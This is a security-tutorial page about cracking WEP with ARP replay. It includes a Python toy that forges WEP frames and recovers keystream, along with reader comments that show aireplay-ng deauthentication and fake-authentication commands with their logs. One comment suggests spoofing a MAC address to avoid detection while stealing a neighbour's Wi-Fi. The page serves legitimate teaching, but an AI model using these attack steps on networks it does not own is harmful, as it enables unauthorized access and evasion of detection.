Description: Welcome to Part 15 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we finally reach the promised land - WEP Cracking :) We talk about the cryptographic weaknesses plaguing WEP (a keyless CRC-32 integrity check, a 24-bit IV space that repeats, and RC4 key-scheduling leaks) and then look at how to crack WEP either passively or actively. In active cracking, we use the popular ARP replay technique to stimulate the network into sending more data packets. We then see that packets with weak IVs contribute towards key recovery, and once we have collected enough of them, tools like Aircrack-ng can comfortably crack the WEP key.
Hope you enjoy this video! :)
Tags: 802.11, WEP, Cracking, Aireplay-ng, ARP, replay, security, hacking, wireless, weak IV
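The description above leans on three properties of WEP: the ICV is a plain CRC-32 that needs no key, the access point does no replay detection, and the IV is only 24 bits with a small class of "weak" values. The toy implementation below is an added example, not code from the video or from the aircrack-ng suite, that shows why ARP replay and packet forgery work against WEP and what the original FMS weak-IV class looks like. The key, the IV, and the ARP frame are constructed for the demo; `fms_weak_iv` recognises only the FMS form (A+3, 0xFF, X), whereas aircrack-ng also uses the broader KoreK classes.

```python
"""Toy WEP frame encryption and the attacks the video relies on.

Added example, not code from the SecurityTube page or from aircrack-ng.
The key, IVs and frames below are constructed for the demo; the ARP
plaintext prefix is the standard LLC/SNAP + ARP-request header that real
ARP replay tools also assume.
"""
import math
import zlib

KEY = bytes.fromhex("0badc0ffee")            # constructed 40-bit WEP key
KEY_LEN = len(KEY)

# Known plaintext of every ARP request on an 802.11 LAN: LLC/SNAP header
# (AA AA 03 00 00 00 08 06) followed by the fixed ARP fields
# (hw=Ethernet, proto=IPv4, hlen=6, plen=4, opcode=request).
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")

# A complete constructed ARP request: prefix + sender MAC/IP + target MAC/IP.
ARP_REQUEST = (ARP_REQUEST_PREFIX
               + bytes.fromhex("001122334455") + bytes([192, 168, 1, 10])
               + bytes(6) + bytes([192, 168, 1, 1]))


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV||key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    keystream = rc4(iv + key, len(body))
    return iv + bytes(b ^ k for b, k in zip(body, keystream))


def wep_decrypt(key: bytes, frame: bytes):
    """What the AP does: decrypt and accept if the ICV matches. No replay check."""
    iv, ct = frame[:3], frame[3:]
    body = bytes(c ^ k for c, k in zip(ct, rc4(iv + key, len(ct))))
    pt, tag = body[:-4], body[-4:]
    return pt if icv(pt) == tag else None


def recover_keystream(frame: bytes, known_plaintext: bytes) -> tuple:
    """Known plaintext XOR ciphertext = keystream for this IV (attacker has no key)."""
    iv, ct = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(ct, known_plaintext))


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Build a frame the AP accepts using only a recovered keystream prefix."""
    body = plaintext + icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("need %d keystream bytes, have %d" % (len(body), len(keystream)))
    return iv + bytes(b ^ k for b, k in zip(body, keystream))


def fms_weak_iv(iv: bytes, key_len: int = KEY_LEN):
    """Original FMS weak-IV class (A+3, 0xFF, X): leaks key byte A with ~5% probability.

    aircrack-ng also uses the broader KoreK classes; this checks only the FMS form.
    Returns the index of the key byte attacked, or None."""
    a = iv[0] - 3
    return a if iv[1] == 0xFF and 0 <= a < key_len else None


def iv_reuse_bound(iv_bits: int = 24) -> int:
    """Random IVs after which a repeat is about 50% likely (birthday bound)."""
    return int(math.sqrt(2 * math.log(2) * 2 ** iv_bits))


def demo() -> bytes:
    """Capture one encrypted ARP request, recover keystream, forge a new frame."""
    iv = b"\x01\x02\x03"                                    # constructed IV
    captured = wep_encrypt(KEY, iv, ARP_REQUEST)
    assert wep_decrypt(KEY, captured) == ARP_REQUEST        # a replay is accepted as-is
    iv, keystream = recover_keystream(captured, ARP_REQUEST_PREFIX)
    forged = forge_frame(iv, keystream, b"hello router")    # 12 bytes + 4-byte ICV
    return wep_decrypt(KEY, forged)                         # AP accepts the forgery


if __name__ == "__main__":
    print(demo())
    print("FMS weak IV 03:ff:07 attacks key byte", fms_weak_iv(b"\x03\xff\x07"))
    print("50% chance of an IV repeat after ~%d frames" % iv_reuse_bound())
```

`demo()` is the whole ARP replay story in miniature: because the AP never checks for replays, a single captured ARP request (recognisable by its fixed size and broadcast destination even though it is encrypted) can be re-sent indefinitely, and every re-broadcast comes back under a fresh IV, which is exactly the IV supply aircrack-ng needs. The forgery step shows the separate point that a 16-byte keystream prefix recovered from known plaintext already lets an attacker inject frames with a valid ICV without knowing the key.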
First reply :$
I will watch this now.
Thanks a lot.
You said part 14 lol :P, is it 14 or 15?
Vivek, you are an incredibly gifted man and I sincerely thank you for your time and trouble in making this excellent series.
What screencast software are you using on that overpriced hunk of a rotten Apple you have? :-)
Have done lots of WEP cracking the "script kiddie" way... now I understand more about "why" the procedures needed to be done.
Thanks again for the fantastic tutorial Vivek, please keep going! =)
Hey Vivek, your videos are awesome. I have already seen all your Metasploit videos, and I want to say that the videos are really very good.
thanks
Great video Vivek, keep up the good work. I hope that after these wireless security videos you could do a series of videos on network pen-testing... and then offer advice on security and all the fun stuff.
Awesome, thanks Vivek.
@ksa.hacker yes, that was a typo on the slide. Realized it later. Not in a mood to do video editing :) so left it at that.
@Blackmarketeer Thanks Buddy! I am using QuickTime on my Mac. It has an awesome screen capture option. For the picture-in-picture I use PIP, which is free.
@Fitzroy Glad the video was useful :)
@Abaddon, vik_tester, behrouz Thanks Guys!
@infiltrator Yes, I will try to do those as well :)
Mmm, very nice Vivek, very nice video, thanks a lot. I was wondering, when you complete these courses can you make another course about penetration testing with BackTrack?
Simply wonderful! This is exactly what I wanted. I assume this is what SpoonWEP does behind the scenes?
What keys are you hitting to clear the screen? I hate typing clear everytime
Just watched it now, I must say it was great. Thanks again Vivek.
Thank you Vivek for your nice upload. Please, we need multiple methods for cracking WPA and WPA2 with the latest methods and tools.
Thank You,
Thank you. Keep up the good work.
Vivek, I really consider you my mentor, so can I ask you for a favor?? Yes I will :D.
I'm just a noob in the security field. I already have an MCSE, I have a good networking background - "as I think" - and I have a not bad Linux background. I want to enter the security field based on a solid background, so could you recommend an appropriate road-map to start? "I don't mean certificates here", I mean what should I learn first, "like steps into the security field".
Sorry for being annoying.
Thank you in advance.
Hey Vivek, are you planning on covering WPA/WPA2 cracking in this megaprimer? :)
These videos really are a cut above the rest. It's hard to explain complicated subjects to people and you do a fine job of it, Vivek. I'm glad that you're posting these for free. I know that helps out people just now learning this stuff & don't have a job yet.
I say that because you very easily could have charged for videos of this quality (says the guy that just spent a ton on CISSP videos).
Jaysin said "What keys are you hitting to clear the screen? I hate typing clear everytime"
Try Ctrl-L
Great, as every other video of the megaprimer.
go on go on :)
@Net-B0x I might. I am not really decided yet to be honest :)
@Jaysin I use Ctrl-L to clear the screen, it's a nifty little shortcut.
@m0ei, 3lL060 Thanks guys!
@Abaddon, @zidane Patience my friend :) Everything will come.
@elostaz3omda Your question requires a very detailed answer. I am planning to put together a tutorial on this subject as I receive a lot of emails on them. Stay Tuned!
@WCNA I don't think I will ever charge for the course material on ST. I believe all Education should be Free and be available for everyone - rich or poor, immaterial. This is my small contribution in that direction.
Thank you very much Vivek, it's incredible... Honestly I'm thinking of travelling to India just to meet you face to face LooooL... Congratulations, I'm your biggest fan ever.
Think about it Vivek, I think it will be a very good idea.
Ah control-L. I should have known that. Haha thanks guys
Vivek said- "I believe all Education should be Free and be available for everyone".
I absolutely agree with you .........but if you say that in the US, they'll call you a communist :)
(Shhhh.....musn't let potential employers from knowing I believe in free higher education; even though it might save America from it's present decline).
Oops!
musn't let potential employers from knowing == (must keep potential employers from knowing || musn't let potential employers know)
Error 421: Data corrupted in transit from brain to keyboard. :)
Error 421 is much better than "Error 404 :brain Could not be found" ....just kiddin :P
Thanks again Vivek!!!!! You have answered so many questions in this video series and I really appreciate the time and effort!!! Like Net-B0x said, a pen-testing with BackTrack megaprimer would be excellent. I know you must be very busy with other projects for SecurityTube, but please consider the pen-testing series, I'm sure there are a lot of people interested in that!!!!
awesome video Vivek. Can't wait to learn how some of the more advanced attacks like chop-chop and your Cafe-latte attack works.
Mr Vivek, is your book "Wireless Pentesting With BackTrack" free?
-Vivek-
Let me start by simply saying thank you for taking the time to put these awesome tutorials together.
The past few months my interest in information security has been sparked! It is a field I believe I can excel in.
My first subject of study since then has, interestingly enough, been wireless security! I learned a lot through just reading how-tos and tutorials left and right, then I stumbled across this series. You've done a great job of explaining many specific topics which I *was* unclear about.
You have inspired me to continue and I thank you again!
I also read this above:
"I don't think I will ever charge for the course material on ST. I believe all Education should be Free and be available for everyone - rich or poor, immaterial. This is my small contribution in that direction."
This is the future! The internet is our gateway into making this The reality.
thank you again, and i look forward to your future contributions :)
peace!
You are really awesome Sir. Please upload videos related to reverse engineering and SET (Social Engineering Toolkit) in BackTrack ASAP. The delivery of the content is very good. I hope we will see more of your videos soon. Thanks again for these videos. They are really helping me to learn lots of things, and in my studies also.
Waiting for the next one.....
"Waiting for next one....."
here you go: http://vimeo.com/23207363 before Vivek :p
@ahmadqdemat You are most welcome to come down :) I'd be happy to have a coffee / beer with you :)
Vishal, Net-B0x, Jaysin, esojzuir, Acebond, soheil.r, Machinist Thanks for all the compliments guys! More videos in this series and other new series, both to come! stay tuned :)
@m0ei You beat me to it by microseconds :) The next video is online now.
@nu11 I am happy you feel so! Security / Hacking is probably one of the most addictive things out there :)
@WCNA, Dr. Error Well, let them call me what they want :) Free Education for all! Free! Free! Free! :)
When I do airodump-ng --channel 1 mon0 I get
CH 1 ][ Elapsed: 6 mins ][ 2011-05-11 08:10 ][ fixed channel mon0: -1
It also says you are on channel -1 whereas the SSID is on channel 1 at some later point too. What is it? And how do I get "back" on the "track"? :)
I am using Ubuntu 10.10 by the way. Thanks in advance.
Never mind, I found the solution. I followed this advice from one of the places on the internet, can't remember where. But it worked.
patching wireless driver
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
Thank you very much for a great job...
Vivek, you mentioned getting caught with active attacks, but why not use the good old-fashioned
ifconfig mon0 down
ifconfig wlan0 down
macchanger --mac 13:37:13:37:13:37 wlan0
macchanger --mac 13:37:13:37:13:37 mon0
ifconfig wlan0 up
ifconfig mon0 up
;) This is what I would do if I had to crack WEP to watch your videos because I can't afford internet from these greedy ISPs...
Thanks Vivek for all the hard work in making these videos! It is greatly appreciated!
thanks professor R, another great video, WEP has been really fun so far!
I almost raised my hand to tell you about the fakeauth mistake, feels like I'm in a class room! Thanks, You are a great teacher.
Thanks for all these videos Vivek. I am more of a self-taught / learning person, so these one-on-one videos are just absolutely perfect. I am basically getting a university degree watching your megaprimers. I am 15 episodes into this one and going through each video twice if not three times, and I myself have learned a ton. After this video I pen-tested my own network: within 1 to 2 minutes I cracked both the 64-bit and 128-bit keys, all completely randomly generated. It was very interesting to see how easy it is to crack WEP encryption. But again, I can't thank you enough.. keep doing what you're doing.. now I'm back to class, see ya in the many more videos ^-^
I am not able to get the handshake, any idea? I already posted the same question on your Twitter and FB, maybe I will get an answer. In this question my client is already connected; I am trying to deauth the client but it seems it doesn't work. In the ARP request I am getting very few packets, not more than 2 after a long time. Any solution, people?
vivek. thanks for sharing. i can't tell you how much i appreciate this. your videos have sparked my interest in so many things. so many questions. i have been brushing up on my calculus to get a grip on the math involved in encryption.
Having an issue with this on BackTrack 5 R1 and v1.1 of aircrack-ng suite. The AP is rejecting my arp injection packets, even with -h specified using the associated clients MAC address. When I do a fakeauth it works, but never without.
Am I missing something obvious? Tips, thoughts?
Hello there,
First of all, thank you so much for these precious videos!
I have a problem when I execute
aireplay-ng --arpreplay -e target_essid mon0,
and it keeps showing me:
mon0 is on channel -1, but the AP uses channel 1
Now, I have been searching for a solution to this problem in different forums, seen some suggestions and solutions, but none of them seems to work here. I also tried what a member named sakar mentioned above, which is:
patching wireless driver
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
but still it doesn't work, I keep getting the same message: mon0 is on channel -1, but the AP uses channel 1
Please Mr Vivek, I would really appreciate it if you could give a little help!
Thank you in advance!
Excellent! It's a shame that with the DeAuth attack it's so evident that your MAC is being re-used. I suppose that under penetration testing I should keep quiet and be patient.
this was a really fun video!!!
How can I download this video?
Hi, friends
I know it will be a lengthy question but I've got lots of confusion, so please, plz.. plz... plz... try to solve my problem..
---> putting adapter in monitor mode
root@DELL:~# airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1171 NetworkManager
1439 wpa_supplicant
2668 dhclient3
2802 dhclient3
Process with PID 2668 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Unknown brcmsmac - [phy0]
(monitor mode enabled on mon0)
>> here although I'm getting this warning, my card is in monitor mode (according to the iwconfig output)
mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
>> here wlan0 is in "Managed" mode, but I think it will not be a problem... mon0 is in monitor mode...
My victim API is one of my friend's laptops, running on channel 10.
So, I started capturing packets on channel 10 (after setting my interface to channel 10), and in another shell I started the fake-authentication attack
root@DELL:~# airodump-ng -c 10 mon0 --write captured
root@DELL:~# aireplay-ng --fakeauth 10 mon0 -e satish_wep
output of airodump-ng:
CH 10 ][ Elapsed: 1 min ][ 2012-10-28 22:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BE:E4:9F:2B:FD:94 -1 0 1148 0 0 10 54 WEP WEP satish_wep
68:A3:C4:23:FD:94 -1 0 0 0 0 -1 -1 <length: 0> <--why this extra API is listed... (as a hidden API)
BSSID STATION PWR Rate Lost Packets Probes
BE:E4:9F:2B:FD:94 68:A3:C4:23:FD:94 -28 0 -12 0 725
BE:E4:9F:2B:FD:94 CC:AF:78:73:94:8A -30 0 -12 1131 656
68:A3:C4:23:FD:94 C0:CB:38:4B:3E:BC 0 0 - 1 0 43
BE:E4:9F:2B:FD:94 8C:A9:82:5E:3A:C6 -57 0 -12 37 527 satish_wep <--------- client connected
Q1---> Here I've got confusion. My friend's actual MAC is 68:A3:C4:23:FD:94, but airodump-ng shows the API BSSID as BE:E4:9F:2B:FD:94 (it's dynamically showing a fake BSSID, don't know why, but whenever I start a new API from my friend's laptop it shows a new BSSID.......). So, how is it actually assigning a fake BSSID (from Windows 7)?
The API has one client connected (another friend's laptop),
and why is it showing the actual MAC as a connected client?
output of aireplay-ng --fakeauth:
root@DELL:~# aireplay-ng --fakeauth 10 mon0 -e satish_wep
No source MAC (-h) specified. Using the device MAC (C0:CB:38:4B:3E:BC)
22:14:22 Waiting for beacon frame (ESSID: satish_wep) on channel 10
Found BSSID "68:A3:C4:23:FD:94" to given ESSID "satish_wep".
22:14:22 Sending Authentication Request (Open System)
22:14:24 Sending Authentication Request (Open System)
22:14:26 Sending Authentication Request (Open System)
22:14:28 Sending Authentication Request (Open System)
--Attack was un-successfull.
Q2------> See here, the BSSID is 68:A3:C4:23:FD:94 (actual) but I am not getting an authentication/de-authentication response.. don't know why.
Here if I use the API BSSID (i.e. BE:E4:9F:2B:FD:94) then I'm getting the output:
root@DELL:~# aireplay-ng --fakeauth 10 mon0 -a BE:E4:9F:2B:FD:94
No source MAC (-h) specified. Using the device MAC (C0:CB:38:4B:3E:BC)
22:21:18 Waiting for beacon frame (BSSID: BE:E4:9F:2B:FD:94) on channel 10
2:21:28 No such BSSID available.
Please specify an ESSID (-e).
And if I specify the -e option then it will take either BE:E4:9F:2B:FD:94 or 68:A3:C4:23:FD:94; if it takes the fake BSSID then there is no response from the API, and if it takes the actual BSSID then No Such BSSID available (beacon frames are received in airodump-ng but here it is showing no response... don't know why?? :(
.>>>
De-authentication attack also now working...
root@DELL:~# aireplay-ng --deauth 0 mon0 -a BE:E4:9F:2B:FD:94
22:28:51 Waiting for beacon frame (BSSID: BE:E4:9F:2B:FD:94) on channel 10
22:29:01 No such BSSID available.
Please specify an ESSID (-e).
and if I use the ESSID directly then....
root@DELL:~# aireplay-ng --deauth 0 mon0 -e satish_wep
22:29:47 Waiting for beacon frame (ESSID: satish_wep) on channel 10
Found BSSID "8C:A9:82:5E:3A:C6" to given ESSID "satish_wep".
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
22:29:47 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:48 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:48 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:48 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:49 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:49 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:50 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:50 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:51 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:51 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:52 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:52 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
>>> but then also the client remains connected...
I don't know why data packets are not received.... I tried using aireplay-ng --arpreplay but there also I'm not getting ARP requests and ACKs... both remain 0.. however Read packets increases.
I've googled a lot but still I'm not getting a solution.. plz Vivek help me...
Thanks for all of your videos and your help....
I'm using BackTrack 5 R3.. (64-bit Gnome)
#uname -r
3.2.6
Oops... I mean BT5 R2.. sorry
If no client is connected, how do I use --fakeauth if it doesn't generate any ARP packets?
Awesome video as usual, however do you have any good resources for exploring the cscope and ctags tools? I'm kind of new to both security and Linux in general (I figured that they were each useful for learning the other) and I had a hard time following along with getting the source code up. I am quite interested in this as I do have a programming background and would like to see how it works behind the scenes.
World's best free videos, thanks Vivek bhai ...